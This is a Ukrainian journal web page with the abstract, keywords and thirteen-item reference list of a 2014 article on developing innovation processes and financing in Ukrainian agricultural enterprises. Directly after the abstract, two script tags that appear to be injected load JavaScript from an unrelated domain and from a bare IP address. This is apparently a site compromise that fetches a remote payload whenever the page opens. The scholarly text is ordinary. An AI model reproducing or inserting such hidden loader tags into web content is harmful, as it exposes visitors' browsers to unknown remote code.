ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.436
Сторінка молодого науковця

Розвиток інноваційних процесів у вітчизняних аграрних підприємствах / Савицький Е. Е. // Економіка АПК. - 2014. - № 4 - С. 77

Вивчено теоретичні положення та практичні засади розвитку інноваційних процесів в аграрній сфері. Досліджено сутність і особливості інноваційного процесу та інноваційної діяльності в АПК, запропоновано авторське трактування вказаних понять. Проаналізовано ключові перешкоди на шляху інноваційного розвитку аграрного сектору України, запропоновано заходи щодо активізації інноваційного процесу в аграрній сфері. Розглянуто структуру джерел фінансування інновацій в аграрних підприємствах, досліджено види та форми підтримки їхньої інноваційної діяльності за рахунок бюджетних коштів. Оцінено сучасний стан стимулювання інноваційної активності в АПК і його ефективність. Запропоновано показник корисної віддачі від фінансування інновацій в аграрній галузі та проаналізовано його динаміку за останні роки. Табл.: 2. Рис.: 2. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інноваційний процес, інноваційна діяльність, інноваційні технології, аграрні підприємства, впровадження інноваційних технологій, ефективність фінансування аграрних інновацій

Список використаних джерел

  1. Андреев П.А. Инновационные процессы в сельском хозяйстве / П.А. Андреев. – М.: “Агро-Вестник”, 2000. – 182 с.
  2. Зоргач А.М. Ефективність застосування інноваційних проектів в аграрних підприємствах [Електронний ресурс] / Зоргач А.М. – Режим доступу: http://www.confcontact.com/2008dec/5_zorgach.php.
  3. Ігнатьєва Т.Г. Бюджетна підтримка інноваційної діяльності аграрних підприємств України: стан, особливості та проблеми [Електронний ресурс] / Ігнатьєва Т.Г. – Режим доступу: http://www.nbuv.gov.ua/portal/Soc_Gum/inek/2012_1/240.pdf.
  4. Коденська М.Ю. Інноваційний продукт аграрно-економічної науки, його оцінка та інвестиційне забезпечення [Електронний ресурс] / М.Ю. Коденська, Н.М. Перепелиця. – Режим доступу: http://www.nbuv.gov.ua/portal/Chem_Biol/Vkhnau_ekon/2009_11/pdf/11_02.pdf.
  5. Курило Л.І. Державне регулювання інноваційної діяльності в аграрному секторі [Електронний ресурс] / Л.І. Курило. – Режим доступу: http://archive.nbuv.gov.ua/portal/chem_biol/VSnau/2011_2/52Kurylo.pdf.
  6. Наукова та інноваційна діяльність в Україні. – Стат. зб. – К., 2011.
  7. Розвиток аграрного виробництва як передумова забезпечення продовольчої безпеки України. – К.: НІСД, 2011. – 40 с.
  8. Селевко Є.О. Інноваційний розвиток аграрної сфери економіки України [Електронний ресурс] / Є.О. Селевко. – Режим доступу: http://www.nbuv.gov.ua/portal//soc_gum/znptdau/2012_18_1/18-1-43.pdf.
  9. Янковська О.І. Інноваційний процес у сільському господарстві / О.І. Янковська // Наука і економіка: науково-теоретичний журнал Хмельницького екон. ун-ту. – 2009. – № 4 (16), Т. 2. – С. 54-58.
  10. Carl K. Eicher, John M. Staatz. International Agricultural Development (The Johns Hopkins Studies in Development). – Publisher: The Johns Hopkins University Press; 3rd edition, 1998. – 632 p.
  11. Manfred Zeller. The Triangle of Microfinance: Financial Sustainability, Outreach, and Impact (International Food Policy Research Institute). – Publisher: International Food Policy Research Institute, 2003. – 424 p.
  12. Mensh G. Stalemate in technology: Innovation Overcome the Depression. – Cambridge: Mass, 1979. – 241 p.
  13. World Bank. Agriculture Investment Sourcebook (Trade and Development). – Publisher: World Bank Publications, 2005. – 536 p.
Читати статтю: 14_04_77-82.pdf
Читати переклад статті: 1404savytskyi.pdf